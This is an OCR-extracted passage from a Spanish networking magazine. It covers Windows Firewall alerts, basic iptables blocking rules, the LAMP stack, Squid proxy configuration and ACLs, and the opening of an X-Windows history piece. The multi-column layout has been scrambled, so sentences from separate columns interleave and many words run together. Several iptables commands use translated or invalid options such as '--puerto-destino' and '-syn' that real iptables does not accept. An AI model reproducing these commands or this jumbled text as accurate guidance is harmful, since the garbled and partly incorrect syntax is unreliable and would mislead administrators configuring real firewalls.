paquetes entrantes no solicitados, y
tampoco agrega la aplicación a la lista
de exclusiones. Pero el administrador
será alertado nuevamente cuando la
aplicación vuelva a ejecutarse.
Para poder conocer la ubicación (el
path) donde se encuentra la aplicación
en cuestión, posicionamos el puntero
del mouse sobre el nombre y/o descip-
ción de la aplicación que aparece en la
pantalla del Windows Security Alert.
Si el usuario no es administrador local,
el Windows Security Alert se limita
sólo a informar que el tráfico de pa-
quetes a través del puerto solicitado
por la aplicación ha sido denegado,su-
giriendo ponerse en contacto con el
administrador del sistema para re-
solver el problema.
Contrariamente a lo que sucede con
las aplicaciones, los servicios no
alertan al usuario a través del
Windows Security Alert, por lo que
Fig. 10 deberemos configurar manualmente
las exclusiones que sean necesarias.
Foto: © 2005 Hemera Technologies Inc.
LINUX

IPtables
Pero esto no es todo. Necesitamos también es-
pecificar a qué chain o cadena vamos a aplicar
esta regla. Para eso está el parámetro -A.

iptables -A INPUT -s 200.200.200.1 -j DROP

Este sencillo comando procederá a ignorar


Iptables (tambien conocido como net-
todo paquete entrante desde la IP
filter) nos permite configurar un
200.200.200.1 (con algunas excepciones que
Firewall de forma que tengamos con- más adelante veremos en detalle). Bien,
trolado quien entra, sale y/o enruta a nuestra máquina es ahora capaz de ignorar las
través de nuestra máquina Linux. peticiones de una determinada computadora
en la red. Si, por el contrario, lo que buscamos
PorMarceloC.A.Romeo
es que a nuestra computadora le sea imposible
comunicarse con esa otra, simplemente cam-
biaremos el INPUT por el OUTPUT, y el
parámetro -s por el -d.

iptables -A OUTPUT -d 200.200.200.1 -j


IPtables: ¿Quées? paquetes que pasarán a través de ellas. Por DROP
ejemplo, cuando nuestra computadora envía
IPtables es un sistema de firewall vinculado un paquete a www.yahoo.com solicitando una Como vemos, no se trata de algo extremada-
al kernel de linux que se ha extendido determinada página HTML, este lo hace a mente difícil. Pero… ¿y si quisiéramos ignorar
enormemente a partir del kernel 2.4 de este través de un OUTPUT chain.En ese momento, el sólo las peticiones Telnet provenientes de esa
sistema operativo. A diferencia de un firewall kernel se fija si alguna de las reglas por misma IP? También es sencillo. Todos sabemos
tradicional, que puede levantarse o bajarse nosotros establecidas en la cadena de salida que el 23 es el puerto dedicado a Telnet,
como un servicio o que puede caerse debido está relacionada de alguna forma con esa solic- aunque bastará con sólo usar la palabra Telnet.
a un error de programación, iptables es un itud. De no haberla, el paquete sale libremente Con el parámetro -p deberemos especificar
firewall que está integrado al kernel, es decir, hacia su destino. Al recibir el paquete, Yahoo! uno de los 3 protocolos: TCP, UDP o ICMP
es parte del sistema operativo. Lo que en responderá con otro paquete que entrará a (Telnet, al igual que la mayoría de los servicios,
este caso se hace, entonces, en lugar de lev- nuestra máquina a través del INPUT chain. No corre sobre TCP). Una vez especificado TCP
antar el servicio, es aplicar reglas. Para ello se hay mayor complicación que esta. como protocolo, usaremos --puerto-destino
ejecuta el comando iptables, con el que Ahora que ya tenemos las bases, comencemos para indicar el puerto que está intentando
añadimos, bo-rramos o creamos reglas. Por lo con algo de práctica. Supongamos, por conectarse a nuestra máquina. Atención aquí a
tanto, un firewall de iptables no es más que ejemplo, que queremos blockear todos aque- no confundir --puerto-destino con --puerto-
un simple script de shell en el que se van eje- llos paquetes entrantes provenientes de la di- origen. Para esto, es fundamental no olvidar
cutando las reglas a aplicar. rección IP 200.200.200.1. En primer lugar, usa- que el cliente corre sobre cualquier puerto; es
remos el parámetro -s para especificar una di- el servidor quien corre el servicio sobre el
IPtables: Lobásico rección IP o un nombre DNS. Entonces, la forma puerto 23. Cada vez que necesitemos bloquear
de uso es: un determinado servicio, usaremos --puerto-
Antes que nada, es necesario entender de qué destino y, de ser necesario, usaremos el
manera el firewall trata a los paquetes en- iptables -s 200.200.200.1
opuesto: --puerto-origen. Resumiendo, este
trantes, a los salientes y a aquellos que pasan a sería el comando completo:
través de la computadora. En primer lugar, Pero con esto no estamos especificando qué
existe lo que se denominan "chains" (cadenas) hacer con los paquetes. Para esto, se usa el Iptables -A INPUT -s 200.200.200.1 -p
para cada tipo de paquete. Todo paquete en- parámetro -j seguido por alguna de estas tres tcp --puerto-destino telnet -j DROP
trante lo hace a través de un INPUT chain opciones: ACCEPT, DENY o DROP. Como proba-
(cadena de entrada), así como todo paquete blemente se imaginarán, ACCEPT no es lo que Podemos especificar también un rango com-
saliente lo hace a través de un OUTPUT chain estamos necesitando para nuestro cometido. pleto de IPs usando, por ejemplo,
(cadena de salida). Y aquellos paquetes que La opción DENY manda un mensaje al remi- 200.200.200.0/24. Una vez entendido lo prece-
entran a nuestra máquina con destino a otra, lo tente del paquete, diciendo que nuestra com- dentemente expuesto, estamos en grado de
hacen a través de un FORWARD chain (cadena putadora no permite conexiones entrantes. afrontar situaciones más complejas.
de reenvío). Esto constituye la lógica funda- DROP, en cambio, ignora totalmente el paquete Supongamos que tenemos una red local con
mental sobre la que se basa el funcionamiento sin enviar respuesta alguna. Como medida de conexión a Internet (la red local se identifica
de IPtables. mayor seguridad ante posibles ataques prove- como eth0, y la conexión a Internet como
Iptables trabajará basado en determinadas nientes de una determinada IP, será mejor usar ppp0). Y supongamos también que queremos
reglas que nosotros mismos estableceremos esta última opción. El resultado sería entonces: el servicio de Telnet corriendo en la red local,
para regir el comportamiento de estos chains o pero no en Internet. Pues bien, hay una forma
iptables -s 200.200.200.1 -j DROP muy sencilla de hacerlo. Hay dos parámetros,
cadenas, y que determinarán la suerte de los

|42 - NEX / Revista de Networking y Programación


uno para especificar el dispositivo de entrada (- TCP, lo realiza un paquete SYN.La función de un ejemplo, de querer bloquear todos los paque-
i, que es el que usaremos en este caso en par- paquete SYN es simplemente decirle a una tes SYN excepto aquellos que entren por el
ticular) y otro para el dispositivo de salida (-o): computadora que la otra está lista para iniciar puerto 80, el comando a implementar sería el
la conexión. O sea que el paquete SYN lo envía siguiente:
Iptables -A INPUT -p tcp -puerto- la computadora que desea iniciar la conexión.
destino telnet -i ppp0 -j DROP iptables -A INPUT -i ppp0 -p tcp -syn -
Por lo tanto, con sólo bloquear los paquetes
puerto-destino ! 80 -j DROP
SYN entrantes, estaremos impidiendo que
Con esto estaremos cerrando los puertos del otras computadoras puedan ejecutar servicios
lado de Internet, pero manteniendo abiertos sobre la nuestra, pero no que nuestra máquina Si bien es algo complicado, no es demasiado
aquellos del lado de la red local. Sigamos ade- pueda conectarse con ellas. Esto hace básica- difícil de entender. Antes de finalizar, no está
lante con algo más avanzado. Todos sabemos mente que nuestra computadora ignore todas demás aclarar algunos conceptos sobre las
que estos paquetes usan un determinado pro- aquellas conexiones que nosotros no hayamos políticas de uso de las cadenas o chains. Por
tocolo y que, en caso de ser TCP, usan también solicitado antes. Para esto existe el parámetro - default, las de INPUT y OUTPUT están seteadas
un determinado puerto. Puede suceder que syn, que colocaremos luego de haber especifi- en ACCEPT, y la de FORWARD lo está en DENY.
nos veamos tentados a cerrar todos los puertos cado el protocolo TCP: Ahora, si vamos a usar la computadora como
para el tráfico entrante, pero no olvidemos que router, deberemos setear la cadena de
cuando nuestra computadora envía un iptables -A INPUT -i ppp0 -p tcp -syn - FORWARD para que también quede en ACCEPT.
paquete hacia otra, esa otra máquina debe res- j DROP ¿Cómo hacemos esto? Sencillo, usamos el
ponder enviando otro paquete hacia la parámetro -p:
nuestra. Y si todos los puertos para el tráfico Esta es una bonita regla para usar, a menos que
entrante se encuentran cerrados, nuestra estemos corriendo un servicio web (IIS, Apache iptables -P FORWARD ACCEPT
conectividad se vuelve nula. Aquí es cuando se y similares). Si queremos dejar un puerto
hace necesario saber entonces,que cuando dos abierto, por ejemplo el 80 (HTTP), tenemos una Hasta aquí hemos visto lo básico de iptables,
computadoras entablan una conexión del tipo manera sencilla de hacerlo. Al igual que en la pero hay mucho más acerca del tema que
TCP, esa conexión deber ser antes inicializada. mayoría de los lenguajes de programación, un seguiremos tratando a lo largo de nuestras
Este proceso de inicialización en la conexión signo de exclamación quiere decir "no". Por próximas ediciones.
LINUX

LAMP
PorNuriaPratsiPujol
no significa lámpara en inglés

A
Actualmente en los buscadores más relevancia en el mercado). MySQL es el progra-
populares podemos encontrar que la ma de base de datos más usado [2] (Yahoo y la
palabra LAMP nos da como resultado NASA lo utilizan) y PHP un lenguaje de script-
de la búsqueda, links a webs de de- ing [3] (Python es una alternativa posible [4]).
sarrollo de páginas web. Pero entonces si LAMP
no significa lámpara en inglés ¿qué es? ¿Cuál es Ventajas
su utilidad? ¿Y por qué es tan popular?
Lamp es la plataforma elegida para el desarrol-
lo y ejecución de aplicaciones web de alta per-
Etimologíaysignificado formance. Es sólida y confiable, y si Apache es
un indicador, entonces LAMP predomina. Si
Dada la habilidad de la gente de IT para bauti- uno visita los estudios de Netcraft y busca sitios
zar con abreviaturas (los protocolos, aplica- populares, verá que muchos funcionan bajo
ciones…) era de intuir que LAMP podría ser un Apache sobre Linux y que tienen mod_perl o
anacronismo relacionado con este mundo. En mod_php instalados. Netcraft no puede,
1998 una revista alemana publicó la palabra usando sus metodologías actuales detectar
por primera vez para tratar de popularizar el que sitios usan MySQL. Pero, sabirendo el
uso de programas libres. En el mercado número de bajadas que se han hecho de
siempre se relaciona a Linux con programas MySQL se sabe que es muy popular y que está
libres pero no es el único. Existen muchos otros reemplazando en muchos casos las bases de
programas libres que hacen de Linux una datos propietarias especialmente en el mundo
plataforma sumamente útil. de web-servers).
Podríamos clasificar las páginas webs en dos
CreacionesbajoLAMP
tipos: estáticas y dinámicas. Para albergar Variantes
cualquiera de las dos necesitamos un servidor Te recomendamos la página de
de páginas web. Existen programas libres alternativos para O'ReillydedicadaaLAMP.Allíencon-
Las más sencillas son aquellas que brindan con- reemplazar cualquiera de los de LAMP. Como trarás todas las novedades y ayudas
tenidos HTML que son estáticos (HTML-Hyper sistemas operativos podrían utilizarse los BDS paraquedesarrollestuspáginasweb
Text Markup Language que en castellano que (Free BSD, Open BSD, Net BSD) y en vez de vos mismo con las tecnologías
significa Lenguaje de Marcado de Hiper Texto). MySQL por ejemplo PostGreSQL. En cuanto a LAMP:http://www.onlamp.com
Para desarrollar una página web dinámica se los lenguajes de programación podrían ser Perl
Sin embargo si no sos un experto
requiere que el servidor cree al vuelo, al recibir podesanimarteacreartuspáginasd-
o Ruby en vez de PhP o Python. inámicas (weblogs, etc.) con paque-
del usuario entradas, una secuencia de recolec-
tesbasadosenLAMPquepodesen-
ción, y que procese los datos quizás consultan- Masvariantes
peroconnombrepropio
contrarenlared.
do una base de datos. Finalmente retornará al
navegador del usuario algo procesado acorde a
lo que este entró.Los requisitos para hostearlas Para usuarios que trabajen en otras plataformas NúriaPratsiPujol
es la de tener acceso a lenguajes de scripting y existen alternativas para ejecutar los programas
programas que manejen bases de datos. AMP en otros sistemas operativos (notar que Es consultora en programación
hacemos referencia a la palabra sin la L). web/basededatos.Enlaactualidad
Existen diferentes programas que logran en su realiza su doctorado en Física
conjunto crear éstas últimas. Asi MAMP es la abreviatura de Macintosh Teórica en la Universidad de
En el caso de programas libres, al manojo de Apache MySQL y PhP que trabaja con sistemas Barcelona,España.Selapuedecon-
programas, se los conoce como LAMP. Es decir, operativos Mac OS X. tactarennuriapip@nexweb.com.ar
LAMP es el anacronismo de Pero no es todo porque WAMP es la abreviatu-
L: Linux ra de Windows Apache MySQL y PhP y se
A: Apache trabaja Windows.
M: MySQL Esto significa que a pesar que el concepto de Web-bibliografía:
P: PHP o Phyton. LAMP se promocione por especialmente [1] http://www.apache.org/
Linux es el sistema operativo donde Apache [1] O'Reilly y MySQL como "The Open Source Web [2] http://www.mysql.com/
se ejecuta como servidor Web (es uno de los Platform" el conjunto AMP puede ser explota- [3] http://www.php.net/
primeros programas libres que ha obtenido do en otros sistemas también. [4] http://www.python.org/

|44 - NEX / Revista de Networking y Programación


LINUX

A
Actualmente, un administrador de Por lo general un proxy se utiliza para que los es actuar como proxy reverso. Ésto consiste en
red no puede diseñar la imple- usuarios accedan a páginas de Internet; para una salida para servidores de aplicaciones, y
mentación de los servicios para sus ello configuran el nombre del proxy en sus permite publicar servicios de otro servidor.
usuarios sin pensar en utilizar browsers, y el puerto adonde deben enviar los Como con un proxy standard, un proxy reverso
proxies. Tanto desde el punto de vista eco- requerimientos. Una vez que el pedido de una puede servir para mejorar la performance de
nómico como desde la seguridad, son muy im- URL llega al proxy, éste lo resuelve localmente los servicios de Interntet utilizando un Cache,
portantes a la hora de construir una red. Estos o lo reenvía al servidor verdadero. de tal forma que se pueda hacer una especie de
servidores interceptan los pedidos de los En muchos casos este esquema es más que su- "espejo" del servidor principal. La razón más
clientes de una aplicación, y verifican si pueden ficiente, pero en otros escenarios puede importante para instalar un proxy reverso es
completar el pedido ellos mismos. Si no suceder que el administrador quiera que los controlar el acceso desde Internet hacia servi-
pueden, reenvían el pedido al servidor real usuarios salgan a Internet por proxy aunque dores que están detrás de un firewall.
para que complete el requerimiento. no lo configuren explícitamente en sus Squid se puede configurar como proxy con-
El propósito de este mecanismo es mejorar la browsers, o quizás no quiere que los usuarios vencional, transparente o reverso; soporta
performance de la aplicación reduciendo los sepan que están accediendo a la Web a través FTP, Gopher y HTTP.
tiempos de respuesta, y controlar el tráfico de un proxy o sencillamente quiere evitarse el Además soporta SSL, control de acceso y re-
hacia Internet, ya sea por ancho de banda o trabajo de configurar la salida a Internet en portes de todas las actividades. Utilizando un
control de acceso. cada PC. De esta manera aparece el concepto protocolo llamado ICP (Internet Cache
El control del ancho de banda es muy venta- de proxy transparente. Con este tipo de confi-- Protocol), puede compartir información de
joso para abaratar los costos de conexión, ya guración, se interceptan los requerimientos de Cache entre varios servidores para
que cuando se tiene un proxy se necesitan los usuarios de tal forma que al cliente le aprovechar el ancho de banda disponible.
menos accesos a Internet para satisfacer las parezca que accede al servidor original, Cuando Squid está operando en un servidor,
necesidades de la misma cantidad de usuarios. cuando en realidad está pasando por un proxy. consiste en un proceso principal que se llama
Los propios servidores de aplicaciones en Para que un servidor Linux actúe como proxy "squid", un proceso para hacer búsquedas de
Internet, se ven aliviados porque cierta parte transparente, se debe configurar como router nombres ("dnsserver"), programas op-
de su trabajo es realizada por otras máquinas y e instalar Squid. cionales para reescribir pedidos y autenticar,
que interceptan las conexiones de los clientes. Otra de las funciones alternativas de un proxy, y aplicaciones de administración.

Por Marisabel Rodriguez Bilardo


Losproxiessonelementosimpor-
tantesalahoradeimplementar
redes.Squidapesardenecesitar
conocimientosprofundosdeUnix
paraponerloapunto,esunaexce-
lenteopciónporsuestabilidady
suconfiguraciónflexible.

Funcionamiento de Squid HTP o Gopher. El espacio en disco que se JerarquíadelCache


destina al Cache se especifica en el archivo
como Web Cache
de configuración. Una jerarquía de Cache es un conjunto de
Básicamente, Squid se va a ubicar en el borde servidores proxy organizados de forma tal que
de nuestra red constituyendo un límite entre Algoritmo de Búsqueda de respeten un esquema de padres e hijos, para
la red interna e Internet. El propósito de esto laspáginas que los que están más cerca de los accesos a
es hacer que los usuarios tengan un punto Internet, actúen como padres con respecto a
único de salida a la Web, de tal forma que se Cuando un cliente pide un objeto que está los servidores que están más lejos. Los
pueda controlar el tráfico y que cuando varios Internet,el proxy busca en el Cache local; si no lo "padres", resuelven los pedidos que los hijos no
usuarios busquen las mismas páginas no con- encuentra lo va a buscar a otro lugar que puede tienen guardados en su Cache ("MISSES"). Si un
suman ancho de banda yendo a buscarlas a ser otro host especificado en la URL u otro servi- determinado Cache no tiene un objeto en par-
Internet, sino que haya un repositorio en dor proxy denominado "hermano" o "padre", y ticular, manda un mensaje ICP a sus "her-
donde se puedan obtener más rápidamente. de esta forma lo entrega. manos", y éstos le responden con otros men-
De ahí vemos cuáles serían los elementos ICP es un protocolo que Squid utiliza para comu- sajes ICP indicando "HIT" si tienen el objeto, o
necesarios para un software como Squid: nicarse con otros Caches. Se define en dos RFC "MISS" si no lo tienen. El primero, entonces,
- Espacio en disco para guardar los objetos (Request For Comments): la 2186 y la 2187, que utiliza estas respuestas para elegir de qué
rescatados de Internet, denominado Cache hablan del protocolo y las aplicaciones en los Cache obtiene el objeto para entregar al
- Un algoritmo de búsqueda para entregar las Caches jerárquicos en Internet respectivamente. cliente, con lo cual resuelve su propio "MISS".
páginas pedidas por los usuarios ICP se usa primordialmente dentro de una jerar- Este mecanismo asegura que se reduzca la uti-
- Un algoritmo de actualización de las quía de Caches, para ubicar objetos específicos lización del ancho de banda disponible en la
páginas en el repositorio entre servidores denominados "hermanos" (en Organización, y reduce la carga de los servi-
inglés "siblings"). ICP también soporta transmi- dores Web que están fuera de la jerarquía,
ElCache siones multiplexadas de varios streams de sirviendo también como repositorio de
objetos sobre una sola conexión TCP. ICP se im- objetos. Cada Cache en la jerarquía decide in-
Los objetos que se guardan en el Cache son plementa con UDP. Las versiones más nuevas de dependientemente si recurrir al padre, a los
archivos, documentos o respuestas a un Squid, permiten que el protocolo ICP se hermanos o a la URL del objeto para resolver el
pedido de un servicio de Internet como FTP, propague a través de multicast. pedido del cliente. Un hermano no busca por

Revista de Networking y Programación / NEX - 47|


agresivo, pero cuando está cerca del umbral su-
perior se borran más objetos para mantener el
tamaño entre los valores normales.
Cuando Squid elige los objetos para borrar,
examina los que pueden borrarse y los que no,
lo cual está determinado por varios factores.
Por ejemplo, si un cliente pide ese objeto, o
algún hermano o hijo está pidiéndolo, no se va
a borrar. Si el objeto es "negatively-cached"
(guardado negativamente), se va a borrar. Si el
objeto tiene una clave privada de Cache se va a
borrar, porque se supone que esa clave
pertenece solamente a un cliente y al ser
privado no debería ser encontrado en pedidos
subsecuentes. Por último, si el tiempo desde
que se accedió por última vez es más grande
que el tiempo LRU, el objeto es eliminado.
El umbral del LRU se calcula basándose en el
tamaño actual del Cache y los umbrales de
otro Cache un objeto en Internet. Fig. 1 - Webalizer - ocupación mayor y menor en disco. Cuando el
Para que un servidor pertenezca a una jerar- Las estadísticas muestran los accesos tamaño del Cache está estabilizado, el tiempo
quía, se debe indicar en el archivo de configu- de los usuarios mes a mes. de LRU representa cuánto se tarda en llenar (o
ración, especificando los padres y hermanos. reemplazar completamente) el Cache con la
tasa de tráfico en ese momento.
Actualización de las páginas Es obviamente imposible revisar todos los
objetos del Cache cada vez que se necesita
enelCache
espacio en el disco. Se puede revisar sola-
mente un grupo cada vez. La manera de
Squid utiliza un concepto llamado LRU (Last
hacerlo es diferente para Squid 1.1 y Squid 2:
Recently Used) para reemplazar los objetos
Para Squid 1.1 el almacenamiento en el
más viejos del Cache. Esto significa que los
Cache se implementa como una tabla de
objetos que no se accedieron durante un
hash con varios "hash buckets" ("baldes" de
período más prolongado de tiempo son los
hash). Squid 1.1 revisa un "balde" a la vez y
primeros en ser borrados.
ordena los objetos dentro del "balde" por el
El tiempo de expiración LRU se calcula diná-
tiempo de LRU.
micamente. Cualquier objeto que no sea uti-
Los objetos con un tiempo de LRU mayor que
lizado por esa cantidad de tiempo va a ser
el umbral establecido se borran. La frecuencia
borrado del Cache para liberar espacio para
de revisión de objetos se ajusta de tal manera
nuevos objetos. Otra forma de verlo es que
que tarde aproximadamente un día en revisar
ese tiempo es la cantidad de días que llevará
todo el Cache. Los "baldes" son aleatorios
llenar el Cache desde que se encuentra vacío
para que no se revise siempre el mismo a la
con la tasa de tráfico de Internet que hay en
misma hora cada día.
la red de la Organización.
Este algoritmo tiene una desventaja grande:
Cuando el Cache está muy ocupado, el tiempo
al revisar un "balde" a la vez, puede haber en
de LRU baja, para poder borrar más objetos y
los demás "baldes" otros candidatos mejores
que haya espacio en disco para los nuevos. Un
para borrar. Por otro lado el algoritmo de reor-
valor recomendable de tiempo LRU es 3 días. Si
denamiento de "baldes" requiere un uso con-
es menor que 3 días, el Cache probablemente
siderable de CPU.
es muy chico para el volumen de requerimien-
Para Squid 2, se elimina la necesidad de reor-
tos que recibe. Agregando más espacio en
denamiento porque se indexan los objetos
disco hay más disponibilidad de objetos, lo cual
del Cache con una lista ordenada. Cada vez
resulta en el aumento del "HIT RATIO" (Tasa de
que se accede a un objeto, se mueve al princi-
Aciertos), que es la tasa de pedidos que el “Squidesundesarrollo pio de la lista. Pasado un tiempo, los objetos
proxy puede resolver por si mismo.
más usados se ubicarán al principio de la lista,
Squid trata de mantener el uso de disco dentro OpenSourcede y los menos usados pasarán al final. Cuando se
de los umbrales que se configuren. Por defecto,
buscan objetos para borrar, solamente se
el umbral inferior es el 90%, y el superior del "NationalScience revisan los últimos.
95% del total del tamaño configurado del
Desafortunadamente, este tipo de orde-
Cache. Cuando el uso de disco está cerca del Foundation".” namiento consume mucha memoria porque se
umbral inferior, el borrado de objetos es menos

|48 - NEX / Revista de Networking y Programación


necesitan guardar punteros adicionales para
cada objeto en el Cache. De todas maneras se
puede mejorar la performance utilizando
hashes MD5 en vez de claves en texto plano. “SquideselproxymásutilizadodelMundo

InstalandoSquid debidoasucompatibilidadconnumerosos
estándaresylaimplementacióndeprotoco-
Squid generalmente se distribuye desde su
página oficial (www.squid-cache.org) en losdejerarquíasdeCacheybalanceode
forma de archivos fuente, para que el usuario
lo compile y lo instale para su propio sistema carga(ICP,HTCP,CARP).”
operativo. Esto es muy recomendable porque
cada sistema operativo puede estar configu-
rado de una manera diferente aunque tenga
la misma versión. En vez de disponer recursos
para generar los binarios, los desarrolladores
tratan de hacer el código fuente lo más
portable posible. De todas formas, algunos
voluntarios ofrecen binarios para distintos
sistemas operativos, como por ejemplo:
RedHat, Debian , FreeBSD, NetBSD, Windows
NT y XP, que también se pueden conseguir en
la página de Squid.
Luego de obtener el programa y compilarlo, se
instala de acuerdo a la plataforma.
Una vez instalado, hay que hacer pocas con-
figuraciones básicas para que funcione de
manera correcta. Se debe tener en cuenta que
si hay firewalls en la red, se debe abrir el
puerto correspondiente para que los clientes
accedan al proxy, y también permitir al servi-
dor la salida a Internet.
El archivo de configuración del programa se
llama "squid.conf", y varía su ubicación de
acuerdo a la plataforma y la forma de instalar. pueda escribir en el directorio de Cache y en el Fig. 2 - Webalizer -
En Linux se puede encontrar en de Logs. Resumen de las visitas por sitio
"/usr/local/squid/etc/squid.conf".
Por lo general, hay que sacar el signo "#" de co- Cuando se termina de editar el archivo de con-
mentario a las líneas donde figuren las sigu- figuración, hay que crear los directorios de
ientes etiquetas y completar con los valores Swap del Cache. Para eso se ejecuta el
necesarios: comando "squid" con la opción "-z"; por
ejemplo para Linux:
cache_dir: Es el directorio en donde se van a
guardar los cache; se necesita un espacio en /usr/local/squid/bin/squid -z
disco considerable.
Una vez que se terminan de crear los directo-
http_port: El puerto 3128 es el que trae por rios de Swap, se inicia el programa con el sigu-
defecto. iente comando:

http_access: Por defecto se deniega todo /usr/local/squid/bin/squid


acceso, hay que crear reglas para permitir o
denegar el tráfico desde ciertas máquinas Para probar si el servidor funciona correcta-
hacia ciertos destinos. Esta configuración es mente, hay que configurar el browser del
importante y depende de la política de la cliente con el nombre o la IP del host y el
Organización. Más adelante revisaremos puerto que designamos en la variable
cómo se hace. http_port, en la ventana de "Configuración
LAN" del navegador. En el archivo denominado
cache_effective_user y cache_effective_ group: "access.log" podremos verificar si estamos
Configurar estas variables para un usuario que navegando a través del proxy.

Revista de Networking y Programación / NEX - 49|


“¿Bajoquésistemas ListasdeAcceso(ACLs) Para la mayoría de los tipos de ACLs, se pueden
agregar varios valores:
operativoscorre De acuerdo a la política de la Organización, el
acl ventas src 10.10.10.1 10.10.10.2
administrador estará encargado de adminis-
10.10.10.3
SQUID?: trar el ancho de banda disponible para los acl personales dstdomain
usuarios. Squid provee un mecanismo muy www.juan.com.ar www.alberto.com.ar
Linux,FreeBSD, flexible, pero poco intuitivo para permitir o acl permitidos method POST PUT GET
denegar acceso a usuarios o redes a puertos o
NetBSD,OpenBSD, URLs, ancho de banda, programas, entre otros, Utiliza la lógica "OR".Si cualquiera de los valores
que consta de determinadas sentencias lla- del requerimiento del cliente coincide con lo
BSDI,Mac madas "Access Lists" (ACLs). Las mismas se que dice la sentencia, se toma la sentencia
guardan en el archivo de configuración en un como cumplida y se decide lo que indique la
OS/X,OSF/Digital, párrafo destinado para ese propósito. Cada vez regla que se configura más abajo.
que se haga una modificación, se deberá hacer Una vez que tenemos definidas las sentencias
Unix/Tru64,IRIX una reconfiguración del proxy para que tome "acl", hay que indicar a Squid si dicho conjunto
los cambios. Un ejemplo para Linux: de pedidos por parte de los clientes, va a ser per-
,SunOS/Solaris, mitido o denegado.
/usr/local/squid/bin/squid reconfigure Las reglas de las Access Lists, se refieren a las sen-
NeXTStep,SCOUnix,
tencias que describimos antes por sus nombres, y
Squid tiene al menos 20 tipos de ACLs, que se se agrega la palabra clave "allow" o "deny" para
AIX,HP-UX,OS/2” refieren a distintos aspectos de un requeri- permitir o bloquear ese tráfico.
miento o respuesta HTTP, por ejemplo el
origen, el destino y el método del pedido. http_access allow ventas
Una sentencia ACL para Squid consta de 3 ele- http_access deny personales
mentos: un tipo, un nombre y uno o más http_access allow permitidos
valores específicos. Por ejemplo:
Es importante tener en cuenta que Squid verifica las
acl primera src 10.10.10.10 reglas en el orden en que se escriben.La comparación
acl segunda dstdomain www.nexweb.com.ar se realiza secuencialmente hasta tanto se encuentre
acl tercera method GET una coincidencia.Una vez que el paquete cumple la
condición de una línea,se ejecuta la acción indicada y
La primera Access List, representa al host no se sigue comparando.
10.10.10.10, la segunda a los pedidos de los Por ejemplo, a un usuario que tenga una IP que
clientes para la URL www.nexweb.com.ar, y la corresponda a "ventas" se le va a permitir el
Fig. 3 - RRDT - tercera a todos los pedidos HTTP GET. La tráfico directamente.Si no pertenece a "ventas" y
Configurando el SNMP en el servidor y palabra clave "src" se refiere al origen ("source" trata de ingresar a una página de las "perso-
este programa se pueden obtener es- en inglés) del pedido, "dstdomain" al destino nales", no va a poder porque la segunda línea de
tadísticas de Hit Rate. del pedido y "method" al método HTTP. "http_access" lo bloquea.

|50 - NEX / Revista de Networking y Programación


Al final de todas las reglas, debe haber una más LogsyMonitoreo El "Cache Manager" es una aplicación CGI para
general para indicar qué decisión tomar con los mostrar estadísticas sobre los procesos de
pedidos que no coinciden con ninguna regla.Una Squid produce varios logs, como por ejemplo: Squid mientras están corriendo. También se
buena práctica consiste en denegar todo el cache.log, access.log, store.log, referer.log, puede acceder a esta información del servidor
tráfico,para asegurarse de que solamente tengan entre otros. El access.log es el que loguea a través de la línea de comandos.
permitido el tráfico aquellos orígenes o destinos todos los accesos a Internet por parte de los
explícitamente configurados. Por lo tanto, si el usuarios. A través de herramientas como Conclusión
paquete no coincide con ninguna de las premisas
"SARG" y "Webalizer" se pueden realizar es-
declaradas en la lista será descartado. Squid es un proxy para HTTP y FTP de alta per-
tadísticas en formato HTML.
Se pueden llegar a configurar reglas mucho más formance. Es un desarrollo Open Source de
Squid provee dos interfaces para monitorear
complejas, combinando todos los tipos de ACLs "National Science Foundation".
su operación, SNMP y el "Cache Manager".
para tener un control más granular del tráfico, El software es muy útil y fácil de instalar.
Cada uno posee sus ventajas y desventajas, no
pero cuanto más larga es la sentencia, más com- También existen muchas herramientas para
todos los indicadores se pueden ver clara-
prometido está el CPU y de algún modo esto monitorear los procesos y realizar estadísticas
mente con una sola de estas herramientas.
afecta la performance del servidor. de los accesos de los usuarios. La adminis-
Cuando una regla contiene varios elementos, Hay que aprender a usar los valores realmente
tración de Squid requiere conocimientos pro-
todos tienen que coincidir en el pedido del cliente significativos para poder extraer información
fundos de Unix, pero permite un nivel máximo
para que se tome una decisión;en otras palabras, útil. Para obtener la información de SNMP
de granularidad en la configuración de los
utiliza la lógica "AND", por ejemplo: (Simple Network Management Protocol) hay
filtros de control de acceso, que es fundamen-
que habilitar primero el protocolo cuando se
tal para algunos entornos.
http_access allow ventas personales compila el software y luego programar scripts
Squid es el proxy más utilizado del Mundo
http_access deny ventas en Perl o configurar un programa como MRTG
debido a su compatibilidad con numerosos es-
o RRDT. Cuando se utiliza SNMP, Squid reporta tándares y la implementación de protocolos de
La primer regla dice que un pedido desde las IPs de en general los valores como contador y no en jerarquías de Cache y balanceo de carga (ICP,
"ventas" para las páginas en "personales" va a forma de indicador como puede ser un HTCP, CARP).
pasar directamente.Sin embargo,la segunda regla promedio. Los softwares antes nombrados re- Por todo esto, Squid constituye una de las
dice que cualquier otro pedido desde las IPs de alizan estas mediciones automáticamente y mejores soluciones del mercado por su per-
"ventas" va a ser denegado.Estas dos líneas restrin- permiten ver el resultado gráficamente. formance y escalabilidad.
gen a los usuarios de "ventas" a visitar solamente
las páginas que están listadas en "personales".
Las listas de acceso pueden llegar a ser muy com-
plicadas, y el hecho de que importe el orden en
que se escriben también agrega complejidad. Lo
primero que hay que tener en cuenta es que Fig. 4 - RRDT -
siempre hay que escribir las reglas más específi- Es importante monitorear
cas antes que las más generales. el tamaño de los archivos del Cache.

Revista de Networking y Programación / NEX - 51|


Windows
VIDA EN LA PANTALLA
Muchosutilizanentornosgráficos
ysistemasdeventanas(yasea
localmenteoenformaremota),
sinsaberquesesoportaporX-
Windows.Conozcayentienda
estatecnologíabasadaenlaidea
clienteser vidor.

PorLuísOtegui

Laprehistoria:
delastarjetasperforadasa80x25

En un principio, los datos y comandos se introducían en


las máquinas vía tarjetas perforadas. Cajones y cajones
de tarjetas debían ser alimentadas a las computadoras,
de a una por vez, y en un determinado orden, o si no, el
programa fallaba. Más tarde, aparecieron las primeras
terminales de tipo texto, algo parecidas a una máquina
teletipo. En ellas, uno tecleaba las órdenes, y la computa-
dora respondía vía una impresora. La comunicación
usuario-máquina se hizo entonces más fluida…
Luego, aparecieron las primeras terminales de video
"bobas", donde el usuario podía ver el resultado de sus
órdenes de forma casi inmediata. Sin embargo, lo que a
muchos desanimó de esa primera era del video era que
ya no tenían una copia en papel de sus listados de
órdenes, o programas. La aparición de las primeras ter-
minales de video estilo DEC VT hizo más rápida aún la in-
terfaz usuario-computadora…
Pero todo eso cambió a mediados de los 80. Interfaces de
